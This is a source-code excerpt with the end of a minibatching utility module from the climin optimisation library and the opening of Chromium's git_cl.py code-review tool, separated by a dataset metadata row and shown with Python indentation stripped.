be obtained.
batch_size : int
Size of a batch. Last batch might be smaller if ``batch_size`` is not a
divisor of ``arr``.
d : int, optional, default: 0
Dimension along which the data samples are separated and thus slicing
should be done.
Returns
-------
mini_batches : list
Each item of the list is a view of ``arr``. Views are ordered.
"""
# This alternative is to make this work with lists in the case of d == 0.
if d == 0:
n_batches, rest = divmod(len(arr), batch_size)
else:
n_batches, rest = divmod(arr.shape[d], batch_size)
if rest:
n_batches += 1
slices = (slice(i * batch_size, (i + 1) * batch_size)
for i in range(n_batches))
if d == 0:
res = [arr[i] for i in slices]
elif d == 1:
res = [arr[:, i] for i in slices]
elif d == 2:
res = [arr[:, :, i] for i in slices]
return res
def iter_minibatches(lst, batch_size, dims, n_cycles=False, random_state=None):
"""Return an iterator that successively yields tuples containing aligned
minibatches of size `batch_size` from slicable objects given in `lst`, in
random order without replacement.
Because different containers might require slicing over different
dimensions, the dimension of each container has to be givens as a list
`dims`.
Parameters
----------
lst : list of array_like
Each item of the list will be sliced into mini batches in alignemnt with
the others.
batch_size : int
Size of each batch. Last batch might be smaller.
dims : list
Aligned with ``lst``, gives the dimension along which the data samples
are separated.
n_cycles : int or False, optional [default: False]
Number of cycles after which to stop the iterator. If ``False``, will
yield forever.
random_state : a numpy.random.RandomState object, optional [default : None]
Random number generator that will act as a seed for the minibatch order
Returns
-------
batches : iterator
Infinite iterator of mini batches in random order (without
replacement).
"""
batches = [minibatches(i, batch_size, d) for i, d in zip(lst, dims)]
if len(batches) > 1:
if any(len(i) != len(batches[0]) for i in batches[1:]):
raise ValueError("containers to be batched have different lengths")
counter = itertools.count()
if random_state is not None:
random.seed(random_state.normal())
while True:
indices = [i for i, _ in enumerate(batches[0])]
while True:
random.shuffle(indices)
for i in indices:
yield tuple(b[i] for b in batches)
count = next(counter)
if n_cycles and count >= n_cycles:
raise StopIteration()
class OptimizerDistribution(object):
"""OptimizerDistribution class.
Can be used for specifying optimizers in scikit-learn's randomized parameter
search.
Attributes
----------
options : dict
Maps an optimizer key to a grid to sample from.
"""
def __init__(self, **options):
"""Create an OptimizerDistribution object.
Parameters
----------
options : dict
Maps an optimizer key to a grid to sample from.
"""
self.options = options
def rvs(self):
opt = random.choice(list(self.options.keys()))
grid = self.options[opt]
sample = list(ParameterSampler(grid, n_iter=1))[0]
return opt, sample
|
gabobert/climin
|
climin/util.py
|
Python
|
bsd-3-clause
| 11,486
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Copyright (C) 2008 Evan Martin <martine@danga.com>
"""A git-command for integrating reviews on Rietveld."""
from distutils.version import LooseVersion
import base64
import glob
import json
import logging
import optparse
import os
import Queue
import re
import stat
import sys
import textwrap
import threading
import urllib2
import urlparse
import webbrowser
import zlib
try:
import readline # pylint: disable=F0401,W0611
except ImportError:
pass
from third_party import colorama
from third_party import upload
import breakpad # pylint: disable=W0611
import clang_format
import fix_encoding
import gclient_utils
import git_common
import owners
import owners_finder
import presubmit_support
import rietveld
import scm
import subcommand
import subprocess2
import watchlists
__version__ = '1.0'
DEFAULT_SERVER = 'https://codereview.appspot.com'
POSTUPSTREAM_HOOK_PATTERN = '.git/hooks/post-cl-%s'
DESCRIPTION_BACKUP_FILE = '~/.git_cl_description_backup'
GIT_INSTRUCTIONS_URL = 'http://code.google.com/p/chromium/wiki/UsingGit'
CHANGE_ID = 'Change-Id:'
# Valid extensions for files we want to lint.
DEFAULT_LINT_REGEX = r"(.*\.cpp|.*\.cc|.*\.h)"
DEFAULT_LINT_IGNORE_REGEX = r"$^"
# Shortcut since it quickly becomes redundant.
Fore = colorama.Fore
# Initialized in main()
settings = None
def DieWithError(message):
print >> sys.stderr, message
sys.exit(1)
def GetNoGitPagerEnv():
env = os.environ.copy()
# 'cat' is a magical git string that disables pagers on all platforms.
env['GIT_PAGER'] = 'cat'
return env
def RunCommand(args, error_ok=False, error_message=None, **kwargs):
try:
return subprocess2.check_output(args, shell=False, **kwargs)
except subprocess2.CalledProcessError as e:
logging.debug('Failed running %s', args)
if not error_ok:
DieWithError(
'Command "%s" failed.\n%s' % (
' '.join(args), error_message or e.stdout or ''))
return e.stdout
def RunGit(args, **kwargs):
"""Returns stdout."""
return RunCommand(['git'] + args, **kwargs)
def RunGitWithCode(args, suppress_stderr=False):
"""Returns return code and stdout."""
try:
if suppress_stderr:
stderr = subprocess2.VOID
else:
stderr = sys.stderr
out, code = subprocess2.communicate(['git'] + args,
env=GetNoGitPagerEnv(),
stdout=subprocess2.PIPE,
stderr=stderr)
return code, out[0]
except ValueError:
# When the subprocess fails, it returns None. That triggers a ValueError
# when trying to unpack the return value into (out, code).
return 1, ''
def IsGitVersionAtLeast(min_version):
prefix = 'git version '
version = RunGit(['--version']).strip()
return (version.startswith(prefix) and
LooseVersion(version[len(prefix):]) >= LooseVersion(min_version))
def ask_for_data(prompt):
try:
return raw_input(prompt)
except KeyboardInterrupt:
# Hide the exception.
sys.exit(1)
def git_set_branch_value(key, value):
branch = Changelist().GetBranch()
if not branch:
return
cmd = ['config']
if isinstance(value, int):
cmd.append('--int')
git_key = 'branch.%s.%s' % (branch, key)
RunGit(cmd + [git_key, str(value)])
def git_get_branch_default(key, default):
branch = Changelist().GetBranch()
if branch:
git_key = 'branch.%s.%s' % (branch, key)
(_, stdout) = RunGitWithCode(['config', '--int', '--get', git_key])
try:
return int(stdout.strip())
except ValueError:
pass
return default
def add_git_similarity(parser):
parser.add_option(
'--similarity', metavar='SIM', type='int', action='store',
help='Sets the percentage that a pair of files need to match in order to'
' be considered copies (default 50)')
parser.add_option(
'--find-copies', action='store_true',
help='Allows git to look for copies.')
parser.add_option(
'--no-find-copies', action='store_false', dest='find_copies',
help='Disallows git from looking for copies.')
old_parser_args = parser.parse_args
def Parse(args):
options, args = old_parser_args(args)
if options.similarity is None:
options.similarity = git_get_branch_default('git-cl-similarity', 50)
else:
print('Note: Saving similarity of %d%% in git config.'
% options.similarity)
git_set_branch_value('git-cl-similarity', options.similarity)
options.similarity = max(0, min(options.similarity, 100))
if options.find_copies is None:
options.find_copies = bool(
git_get_branch_default('git-find-copies', True))
else:
git_set_branch_value('git-find-copies', int(options.find_copies))
print('Using %d%% similarity for rename/copy detection. '
'Override with --similarity.' % options.similarity)
return options, args
parser.parse_args = Parse
def is_dirty_git_tree(cmd):
# Make sure index is up-to-date before running diff-index.
RunGit(['update-index', '--refresh', '-q'], error_ok=True)
dirty = RunGit(['diff-index', '--name-status', 'HEAD'])
if dirty:
print 'Cannot %s with a dirty tree. You must commit locally first.' % cmd
print 'Uncommitted files: (git diff-index --name-status HEAD)'
print dirty[:4096]
if len(dirty) > 4096:
print '... (run "git diff-index --name-status HEAD" to see full output).'
return True
return False
def MatchSvnGlob(url, base_url, glob_spec, allow_wildcards):
"""Return the corresponding git ref if |base_url| together with |glob_spec|
matches the full |url|.
If |allow_wildcards| is true, |glob_spec| can contain wildcards (see below).
"""
fetch_suburl, as_ref = glob_spec.split(':')
if allow_wildcards:
glob_match = re.match('(.+/)?(\*|{[^/]*})(/.+)?', fetch_suburl)
if glob_match:
# Parse specs like "branches/*/src:refs/remotes/svn/*" or
# "branches/{472,597,648}/src:refs/remotes/svn/*".
branch_re = re.escape(base_url)
if glob_match.group(1):
branch_re += '/' + re.escape(glob_match.group(1))
wildcard = glob_match.group(2)
if wildcard == '*':
branch_re += '([^/]*)'
else:
# Escape and replace surrounding braces with parentheses and commas
# with pipe symbols.
wildcard = re.escape(wildcard)
wildcard = re.sub('^\\\\{', '(', wildcard)
wildcard = re.sub('\\\\,', '|', wildcard)
wildcard = re.sub('\\\\}$', ')', wildcard)
branch_re += wildcard
if glob_match.group(3):
branch_re += re.escape(glob_match.group(3))
match = re.match(branch_re, url)
if match:
return re.sub('\*$', match.group(1), as_ref)
# Parse specs like "trunk/src:refs/remotes/origin/trunk".
if fetch_suburl:
full_url = base_url + '/' + fetch_suburl
else:
full_url = base_url
if full_url == url:
return as_ref
return None
def print_stats(similarity, find_copies, args):
"""Prints statistics about the change to the user."""
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = GetNoGitPagerEnv()
if 'GIT_EXTERNAL_DIFF' in env:
del env['GIT_EXTERNAL_DIFF']
if find_copies:
similarity_options = ['--find-copies-harder', '-l100000',
'-C%s' % similarity]
else:
similarity_options = ['-M%s' % similarity]
try:
stdout = sys.stdout.fileno()
except AttributeError:
stdout = None
return subprocess2.call(
['git',
'diff', '--no-ext-diff', '--stat'] + similarity_options + args,
stdout=stdout, env=env)
class Settings(object):
def __init__(self):
self.default_server = None
self.cc = None
self.root = None
self.is_git_svn = None
self.svn_branch = None
self.tree_status_url = None
self.viewvc_url = None
self.updated = False
self.is_gerrit = None
self.git_editor = None
self.project = None
self.force_https_commit_url = None
self.pending_ref_prefix = None
def LazyUpdateIfNeeded(self):
"""Updates the settings from a codereview.settings file, if available."""
if not self.updated:
# The only value that actually changes the behavior is
# autoupdate = "false". Everything else means "true".
autoupdate = RunGit(['config', 'rietveld.autoupdate'],
error_ok=True
).strip().lower()
cr_settings_file = FindCodereviewSettingsFile()
if autoupdate != 'false' and cr_settings_file:
LoadCodereviewSettingsFromFile(cr_settings_file)
# set updated to True to avoid infinite calling loop
# through DownloadHooks
self.updated = True
DownloadHooks(False)
self.updated = True
def GetDefaultServerUrl(self, error_ok=False):
if not self.default_server:
self.LazyUpdateIfNeeded()
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_ok=True))
if error_ok:
return self.default_server
if not self.default_server:
error_message = ('Could not find settings file. You must configure '
'your review setup by running "git cl config".')
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_message=error_message))
return self.default_server
@staticmethod
def GetRelativeRoot():
return RunGit(['rev-parse', '--show-cdup']).strip()
def GetRoot(self):
if self.root is None:
self.root = os.path.abspath(self.GetRelativeRoot())
return self.root
def GetIsGitSvn(self):
"""Return true if this repo looks like it's using git-svn."""
if self.is_git_svn is None:
if self.GetPendingRefPrefix():
# If PENDING_REF_PREFIX is set then it's a pure git repo no matter what.
self.is_git_svn = False
else:
# If you have any "svn-remote.*" config keys, we think you're using svn.
self.is_git_svn = RunGitWithCode(
['config', '--local', '--get-regexp', r'^svn-remote\.'])[0] == 0
return self.is_git_svn
def GetSVNBranch(self):
if self.svn_branch is None:
if not self.GetIsGitSvn():
DieWithError('Repo doesn\'t appear to be a git-svn repo.')
# Try to figure out which remote branch we're based on.
# Strategy:
# 1) iterate through our branch history and find the svn URL.
# 2) find the svn-remote that fetches from the URL.
# regexp matching the git-svn line that contains the URL.
git_svn_re = re.compile(r'^\s*git-svn-id: (\S+)@', re.MULTILINE)
# We don't want to go through all of history, so read a line from the
# pipe at a time.
# The -100 is an arbitrary limit so we don't search forever.
cmd = ['git', 'log', '-100', '--pretty=medium']
proc = subprocess2.Popen(cmd, stdout=subprocess2.PIPE,
env=GetNoGitPagerEnv())
url = None
for line in proc.stdout:
match = git_svn_re.match(line)
if match:
url = match.group(1)
proc.stdout.close() # Cut pipe.
break
if url:
svn_remote_re = re.compile(r'^svn-remote\.([^.]+)\.url (.*)$')
remotes = RunGit(['config', '--get-regexp',
r'^svn-remote\..*\.url']).splitlines()
for remote in remotes:
match = svn_remote_re.match(remote)
if match:
remote = match.group(1)
base_url = match.group(2)
rewrite_root = RunGit(
['config', 'svn-remote.%s.rewriteRoot' % remote],
error_ok=True).strip()
if rewrite_root:
base_url = rewrite_root
fetch_spec = RunGit(
['config', 'svn-remote.%s.fetch' % remote],
error_ok=True).strip()
if fetch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, fetch_spec, False)
if self.svn_branch:
break
branch_spec = RunGit(
['config', 'svn-remote.%s.branches' % remote],
error_ok=True).strip()
if branch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, branch_spec, True)
if self.svn_branch:
break
tag_spec = RunGit(
['config', 'svn-remote.%s.tags' % remote],
error_ok=True).strip()
if tag_spec:
self.svn_branch = MatchSvnGlob(url, base_url, tag_spec, True)
if self.svn_branch:
break
if not self.svn_branch:
DieWithError('Can\'t guess svn branch -- try specifying it on the '
'command line')
return self.svn_branch
def GetTreeStatusUrl(self, error_ok=False):
if not self.tree_status_url:
error_message = ('You must configure your tree status URL by running '
'"git cl config".')
self.tree_status_url = self._GetRietveldConfig(
'tree-status-url', error_ok=error_ok, error_message=error_message)
return self.tree_status_url
def GetViewVCUrl(self):
if not self.viewvc_url:
self.viewvc_url = self._GetRietveldConfig('viewvc-url', error_ok=True)
return self.viewvc_url
def GetBugPrefix(self):
return self._GetRietveldConfig('bug-prefix', error_ok=True)
def GetDefaultCCList(self):
return self._GetRietveldConfig('cc', error_ok=True)
def GetDefaultPrivateFlag(self):
return self._GetRietveldConfig('private', error_ok=True)
def GetIsGerrit(self):
"""Return true if this repo is assosiated with gerrit code review system."""
if self.is_gerrit is None:
self.is_gerrit = self._GetConfig('gerrit.host', error_ok=True)
return self.is_gerrit
def GetGitEditor(self):
"""Return the editor specified in the git config, or None if none is."""
if self.git_editor is None:
self.git_editor = self._GetConfig('core.editor', error_ok=True)
return self.git_editor or None
def GetLintRegex(self):
return (self._GetRietveldConfig('cpplint-regex', error_ok=True) or
DEFAULT_LINT_REGEX)
def GetLintIgnoreRegex(self):
return (self._GetRietveldConfig('cpplint-ignore-regex', error_ok=True) or
DEFAULT_LINT_IGNORE_REGEX)
def GetProject(self):
if not self.project:
self.project = self._GetRietveldConfig('project', error_ok=True)
return self.project
def GetForceHttpsCommitUrl(self):
if not self.force_https_commit_url:
self.force_https_commit_url = self._GetRietveldConfig(
'force-https-commit-url', error_ok=True)
return self.force_https_commit_url
def GetPendingRefPrefix(self):
if not self.pending_ref_prefix:
self.pending_ref_prefix = self._GetRietveldConfig(
'pending-ref-prefix', error_ok=True)
return self.pending_ref_prefix
def _GetRietveldConfig(self, param, **kwargs):
return self._GetConfig('rietveld.' + param, **kwargs)
def _GetConfig(self, param, **kwargs):
self.LazyUpdateIfNeeded()
return RunGit(['config', param], **kwargs).strip()
def ShortBranchName(branch):
"""Convert a name like 'refs/heads/foo' to just 'foo'."""
return branch.replace('refs/heads/', '')
class Changelist(object):
def __init__(self, branchref=None, issue=None):
# Poke settings so we get the "configure your server" message if necessary.
global settings
if not settings:
# Happens when git_cl.py is used as a utility library.
settings = Settings()
settings.GetDefaultServerUrl()
self.branchref = branchref
if self.branchref:
self.branch = ShortBranchName(self.branchref)
else:
self.branch = None
self.rietveld_server = None
self.upstream_branch = None
self.lookedup_issue = False
self.issue = issue or None
self.has_description = False
self.description = None
self.lookedup_patchset = False
self.patchset = None
self._rpc_server = None
self.cc = None
self.watchers = ()
self._remote = None
self._props = None
def GetCCList(self):
"""Return the users cc'd on this CL.
Return is a string suitable for passing to gcl with the --cc flag.
"""
if self.cc is None:
base_cc = settings.GetDefaultCCList()
more_cc = ','.join(self.watchers)
self.cc = ','.join(filter(None, (base_cc, more_cc))) or ''
return self.cc
def GetCCListWithoutDefault(self):
"""Return the users cc'd on this CL excluding default ones."""
if self.cc is None:
self.cc = ','.join(self.watchers)
return self.cc
def SetWatchers(self, watchers):
"""Set the list of email addresses that should be cc'd based on the changed
files in this CL.
"""
self.watchers = watchers
def GetBranch(self):
"""Returns the short branch name, e.g. 'master'."""
if not self.branch:
branchref = RunGit(['symbolic-ref', 'HEAD'],
stderr=subprocess2.VOID, error_ok=True).strip()
if not branchref:
return None
self.branchref = branchref
self.branch = ShortBranchName(self.branchref)
return self.branch
def GetBranchRef(self):
"""Returns the full branch name, e.g. 'refs/heads/master'."""
self.GetBranch() # Poke the lazy loader.
return self.branchref
@staticmethod
def FetchUpstreamTuple(branch):
"""Returns a tuple containing remote and remote ref,
e.g. 'origin', 'refs/heads/master'
"""
remote = '.'
upstream_branch = RunGit(['config', 'branch.%s.merge' % branch],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'branch.%s.remote' % branch]).strip()
else:
upstream_branch = RunGit(['config', 'rietveld.upstream-branch'],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'rietveld.upstream-remote']).strip()
else:
# Fall back on trying a git-svn upstream branch.
if settings.GetIsGitSvn():
upstream_branch = settings.GetSVNBranch()
else:
# Else, try to guess the origin remote.
remote_branches = RunGit(['branch', '-r']).split()
if 'origin/master' in remote_branches:
# Fall back on origin/master if it exits.
remote = 'origin'
upstream_branch = 'refs/heads/master'
elif 'origin/trunk' in remote_branches:
# Fall back on origin/trunk if it exists. Generally a shared
# git-svn clone
remote = 'origin'
upstream_branch = 'refs/heads/trunk'
else:
DieWithError("""Unable to determine default branch to diff against.
Either pass complete "git diff"-style arguments, like
git cl upload origin/master
or verify this branch is set up to track another (via the --track argument to
"git checkout -b ...").""")
return remote, upstream_branch
def GetCommonAncestorWithUpstream(self):
return git_common.get_or_create_merge_base(self.GetBranch(),
self.GetUpstreamBranch())
def GetUpstreamBranch(self):
if self.upstream_branch is None:
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
if remote is not '.':
upstream_branch = upstream_branch.replace('refs/heads/',
'refs/remotes/%s/' % remote)
upstream_branch = upstream_branch.replace('refs/branch-heads/',
'refs/remotes/branch-heads/')
self.upstream_branch = upstream_branch
return self.upstream_branch
def GetRemoteBranch(self):
if not self._remote:
remote, branch = None, self.GetBranch()
seen_branches = set()
while branch not in seen_branches:
seen_branches.add(branch)
remote, branch = self.FetchUpstreamTuple(branch)
branch = ShortBranchName(branch)
if remote != '.' or branch.startswith('refs/remotes'):
break
else:
remotes = RunGit(['remote'], error_ok=True).split()
if len(remotes) == 1:
remote, = remotes
elif 'origin' in remotes:
remote = 'origin'
logging.warning('Could not determine which remote this change is '
'associated with, so defaulting to "%s". This may '
'not be what you want. You may prevent this message '
'by running "git svn info" as documented here: %s',
self._remote,
GIT_INSTRUCTIONS_URL)
else:
logging.warn('Could not determine which remote this change is '
'associated with. You may prevent this message by '
'running "git svn info" as documented here: %s',
GIT_INSTRUCTIONS_URL)
branch = 'HEAD'
if branch.startswith('refs/remotes'):
self._remote = (remote, branch)
elif branch.startswith('refs/branch-heads/'):
self._remote = (remote, branch.replace('refs/', 'refs/remotes/'))
else:
self._remote = (remote, 'refs/remotes/%s/%s' % (remote, branch))
return self._remote
def GitSanityChecks(self, upstream_git_obj):
"""Checks git repo status and ensures diff is from local commits."""
if upstream_git_obj is None:
if self.GetBranch() is None:
print >> sys.stderr, (
'ERROR: unable to dertermine current branch (detached HEAD?)')
else:
print >> sys.stderr, (
'ERROR: no upstream branch')
return False
# Verify the commit we're diffing against is in our current branch.
upstream_sha = RunGit(['rev-parse', '--verify', upstream_git_obj]).strip()
common_ancestor = RunGit(['merge-base', upstream_sha, 'HEAD']).strip()
if upstream_sha != common_ancestor:
print >> sys.stderr, (
'ERROR: %s is not in the current branch. You may need to rebase '
'your tracking branch' % upstream_sha)
return False
# List the commits inside the diff, and verify they are all local.
commits_in_diff = RunGit(
['rev-list', '^%s' % upstream_sha, 'HEAD']).splitlines()
code, remote_branch = RunGitWithCode(['config', 'gitcl.remotebranch'])
remote_branch = remote_branch.strip()
if code != 0:
_, remote_branch = self.GetRemoteBranch()
commits_in_remote = RunGit(
['rev-list', '^%s' % upstream_sha, remote_branch]).splitlines()
common_commits = set(commits_in_diff) & set(commits_in_remote)
if common_commits:
print >> sys.stderr, (
'ERROR: Your diff contains %d commits already in %s.\n'
'Run "git log --oneline %s..HEAD" to get a list of commits in '
'the diff. If you are using a custom git flow, you can override'
' the reference used for this check with "git config '
'gitcl.remotebranch <git-ref>".' % (
len(common_commits), remote_branch, upstream_git_obj))
return False
return True
def GetGitBaseUrlFromConfig(self):
"""Return the configured base URL from branch.<branchname>.baseurl.
Returns None if it is not set.
"""
return RunGit(['config', 'branch.%s.base-url' % self.GetBranch()],
error_ok=True).strip()
def GetGitSvnRemoteUrl(self):
"""Return the configured git-svn remote URL parsed from git svn info.
Returns None if it is not set.
"""
# URL is dependent on the current directory.
data = RunGit(['svn', 'info'], cwd=settings.GetRoot())
if data:
keys = dict(line.split(': ', 1) for line in data.splitlines()
if ': ' in line)
return keys.get('URL', None)
return None
def GetRemoteUrl(self):
"""Return the configured remote URL, e.g. 'git://example.org/foo.git/'.
Returns None if there is no remote.
"""
remote, _ = self.GetRemoteBranch()
url = RunGit(['config', 'remote.%s.url' % remote], error_ok=True).strip()
# If URL is pointing to a local directory, it is probably a git cache.
if os.path.isdir(url):
url = RunGit(['config', 'remote.%s.url' % remote],
error_ok=True,
cwd=url).strip()
return url
def GetIssue(self):
"""Returns the issue number as a int or None if not set."""
if self.issue is None and not self.lookedup_issue:
issue = RunGit(['config', self._IssueSetting()], error_ok=True).strip()
self.issue = int(issue) or None if issue else None
self.lookedup_issue = True
return self.issue
def GetRietveldServer(self):
if not self.rietveld_server:
# If we're on a branch then get the server potentially associated
# with that branch.
if self.GetIssue():
rietveld_server_config = self._RietveldServer()
if rietveld_server_config:
self.rietveld_server = gclient_utils.UpgradeToHttps(RunGit(
['config', rietveld_server_config], error_ok=True).strip())
if not self.rietveld_server:
self.rietveld_server = settings.GetDefaultServerUrl()
return self.rietveld_server
def GetIssueURL(self):
"""Get the URL for a particular issue."""
if not self.GetIssue():
return None
return '%s/%s' % (self.GetRietveldServer(), self.GetIssue())
def GetDescription(self, pretty=False):
if not self.has_description:
if self.GetIssue():
issue = self.GetIssue()
try:
self.description = self.RpcServer().get_description(issue).strip()
except urllib2.HTTPError as e:
if e.code == 404:
DieWithError(
('\nWhile fetching the description for issue %d, received a '
'404 (not found)\n'
'error. It is likely that you deleted this '
'issue on the server. If this is the\n'
'case, please run\n\n'
' git cl issue 0\n\n'
'to clear the association with the deleted issue. Then run '
'this command again.') % issue)
else:
DieWithError(
'\nFailed to fetch issue description. HTTP error %d' % e.code)
except urllib2.URLError as e:
print >> sys.stderr, (
'Warning: Failed to retrieve CL description due to network '
'failure.')
self.description = ''
self.has_description = True
if pretty:
wrapper = textwrap.TextWrapper()
wrapper.initial_indent = wrapper.subsequent_indent = ' '
return wrapper.fill(self.description)
return self.description
def GetPatchset(self):
"""Returns the patchset number as a int or None if not set."""
if self.patchset is None and not self.lookedup_patchset:
patchset = RunGit(['config', self._PatchsetSetting()],
error_ok=True).strip()
self.patchset = int(patchset) or None if patchset else None
self.lookedup_patchset = True
return self.patchset
def SetPatchset(self, patchset):
"""Set this branch's patchset. If patchset=0, clears the patchset."""
if patchset:
RunGit(['config', self._PatchsetSetting(), str(patchset)])
self.patchset = patchset
else:
RunGit(['config', '--unset', self._PatchsetSetting()],
stderr=subprocess2.PIPE, error_ok=True)
self.patchset = None
def GetMostRecentPatchset(self):
return self.GetIssueProperties()['patchsets'][-1]
def GetPatchSetDiff(self, issue, patchset):
return self.RpcServer().get(
'/download/issue%s_%s.diff' % (issue, patchset))
def GetIssueProperties(self):
if self._props is None:
issue = self.GetIssue()
if not issue:
self._props = {}
else:
self._props = self.RpcServer().get_issue_properties(issue, True)
return self._props
def GetApprovingReviewers(self):
return get_approving_reviewers(self.GetIssueProperties())
def AddComment(self, message):
return self.RpcServer().add_comment(self.GetIssue(), message)
def SetIssue(self, issue):
"""Set this branch's issue. If issue=0, clears the issue."""
if issue:
self.issue = issue
RunGit(['config', self._IssueSetting(), str(issue)])
if self.rietveld_server:
RunGit(['config', self._RietveldServer(), self.rietveld_server])
else:
current_issue = self.GetIssue()
if current_issue:
RunGit(['config', '--unset', self._IssueSetting()])
self.issue = None
self.SetPatchset(None)
def GetChange(self, upstream_branch, author):
if not self.GitSanityChecks(upstream_branch):
DieWithError('\nGit sanity check failure')
root = settings.GetRelativeRoot()
if not root:
root = '.'
absroot = os.path.abspath(root)
# We use the sha1 of HEAD as a name of this change.
name = RunGitWithCode(['rev-parse', 'HEAD'])[1].strip()
# Need to pass a relative path for msysgit.
try:
files = scm.GIT.CaptureStatus([root], '.', upstream_branch)
except subprocess2.CalledProcessError:
DieWithError(
('\nFailed to diff against upstream branch %s\n\n'
'This branch probably doesn\'t exist anymore. To reset the\n'
'tracking branch, please run\n'
' git branch --set-upstream %s trunk\n'
'replacing trunk with origin/master or the relevant branch') %
(upstream_branch, self.GetBranch()))
issue = self.GetIssue()
patchset = self.GetPatchset()
if issue:
description = self.GetDescription()
else:
# If the change was never uploaded, use the log messages of all commits
# up to the branch point, as git cl upload will prefill the description
# with these log messages.
args = ['log', '--pretty=format:%s%n%n%b', '%s...' % (upstream_branch)]
description = RunGitWithCode(args)[1].strip()
if not author:
author = RunGit(['config', 'user.email']).strip() or None
return presubmit_support.GitChange(
name,
description,
absroot,
files,
issue,
patchset,
author,
upstream=upstream_branch)
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or one of the following keywords:
* 'error' - error from review tool (including deleted issues)
* 'unsent' - not sent for review
* 'waiting' - waiting for review
* 'reply' - waiting for owner to reply to review
* 'lgtm' - LGTM from at least one approved reviewer
* 'commit' - in the commit queue
* 'closed' - closed
"""
if not self.GetIssue():
return None
try:
props = self.GetIssueProperties()
except urllib2.HTTPError:
return 'error'
if props.get('closed'):
# Issue is closed.
return 'closed'
if props.get('commit'):
# Issue is in the commit queue.
return 'commit'
try:
reviewers = self.GetApprovingReviewers()
except urllib2.HTTPError:
return 'error'
if reviewers:
# Was LGTM'ed.
return 'lgtm'
messages = props.get('messages') or []
if not messages:
# No message was sent.
return 'unsent'
if messages[-1]['sender'] != props.get('owner_email'):
# Non-LGTM reply from non-owner
return 'reply'
return 'waiting'
def RunHook(self, committing, may_prompt, verbose, change):
"""Calls sys.exit() if the hook fails; returns a HookResults otherwise."""
try:
return presubmit_support.DoPresubmitChecks(change, committing,
verbose=verbose, output_stream=sys.stdout, input_stream=sys.stdin,
default_presubmit=None, may_prompt=may_prompt,
rietveld_obj=self.RpcServer())
except presubmit_support.PresubmitFailure, e:
DieWithError(
('%s\nMaybe your depot_tools is out of date?\n'
'If all fails, contact maruel@') % e)
def UpdateDescription(self, description):
self.description = description
return self.RpcServer().update_description(
self.GetIssue(), self.description)
def CloseIssue(self):
"""Updates the description and closes the issue."""
return self.RpcServer().close_issue(self.GetIssue())
def SetFlag(self, flag, value):
"""Patchset must match."""
if not self.GetPatchset():
DieWithError('The patchset needs to match. Send another patchset.')
try:
return self.RpcServer().set_flag(
self.GetIssue(), self.GetPatchset(), flag, value)
except urllib2.HTTPError, e:
if e.code == 404:
DieWithError('The issue %s doesn\'t exist.' % self.GetIssue())
if e.code == 403:
DieWithError(
('Access denied to issue %s. Maybe the patchset %s doesn\'t '
'match?') % (self.GetIssue(), self.GetPatchset()))
raise
def RpcServer(self):
"""Returns an upload.RpcServer() to access this review's rietveld instance.
"""
if not self._rpc_server:
self._rpc_server = rietveld.CachingRietveld(
self.GetRietveldServer(), None, None)
return self._rpc_server
def _IssueSetting(self):
"""Return the git setting that stores this change's issue."""
return 'branch.%s.rietveldissue' % self.GetBranch()
def _PatchsetSetting(self):
"""Return the git setting that stores this change's most recent patchset."""
return 'branch.%s.rietveldpatchset' % self.GetBranch()
def _RietveldServer(self):
"""Returns the git setting that stores this change's rietveld server."""
branch = self.GetBranch()
if branch:
return 'branch.%s.rietveldserver' % branch
return None
def GetCodereviewSettingsInteractively():
"""Prompt the user for settings."""
# TODO(ukai): ask code review system is rietveld or gerrit?
server = settings.GetDefaultServerUrl(error_ok=True)
prompt = 'Rietveld server (host[:port])'
prompt += ' [%s]' % (server or DEFAULT_SERVER)
newserver = ask_for_data(prompt + ':')
if not server and not newserver:
newserver = DEFAULT_SERVER
if newserver:
newserver = gclient_utils.UpgradeToHttps(newserver)
if newserver != server:
RunGit(['config', 'rietveld.server', newserver])
def SetProperty(initial, caption, name, is_url):
prompt = caption
if initial:
prompt += ' ("x" to clear) [%s]' % initial
new_val = ask_for_data(prompt + ':')
if new_val == 'x':
RunGit(['config', '--unset-all', 'rietveld.' + name], error_ok=True)
elif new_val:
if is_url:
new_val = gclient_utils.UpgradeToHttps(new_val)
if new_val != initial:
RunGit(['config', 'rietveld.' + name, new_val])
SetProperty(settings.GetDefaultCCList(), 'CC list', 'cc', False)
SetProperty(settings.GetDefaultPrivateFlag(),
'Private flag (rietveld only)', 'private', False)
SetProperty(settings.GetTreeStatusUrl(error_ok=True), 'Tree status URL',
'tree-status-url', False)
SetProperty(settings.GetViewVCUrl(), 'ViewVC URL', 'viewvc-url', True)
SetProperty(settings.GetBugPrefix(), 'Bug Prefix', 'bug-prefix', False)
# TODO: configure a default branch to diff against, rather than this
# svn-based hackery.
class ChangeDescription(object):
"""Contains a parsed form of the change description."""
R_LINE = r'^[ \t]*(TBR|R)[ \t]*=[ \t]*(.*?)[ \t]*$'
BUG_LINE = r'^[ \t]*(BUG)[ \t]*=[ \t]*(.*?)[ \t]*$'
def __init__(self, description):
self._description_lines = (description or '').strip().splitlines()
@property # www.logilab.org/ticket/89786
def description(self): # pylint: disable=E0202
return '\n'.join(self._description_lines)
def set_description(self, desc):
if isinstance(desc, basestring):
lines = desc.splitlines()
else:
lines = [line.rstrip() for line in desc]
while lines and not lines[0]:
lines.pop(0)
while lines and not lines[-1]:
lines.pop(-1)
self._description_lines = lines
def update_reviewers(self, reviewers, add_owners_tbr=False, change=None):
"""Rewrites the R=/TBR= line(s) as a single line each."""
assert isinstance(reviewers, list), reviewers
if not reviewers and not add_owners_tbr:
return
reviewers = reviewers[:]
# Get the set of R= and TBR= lines and remove them from the desciption.
regexp = re.compile(self.R_LINE)
matches = [regexp.match(line) for line in self._description_lines]
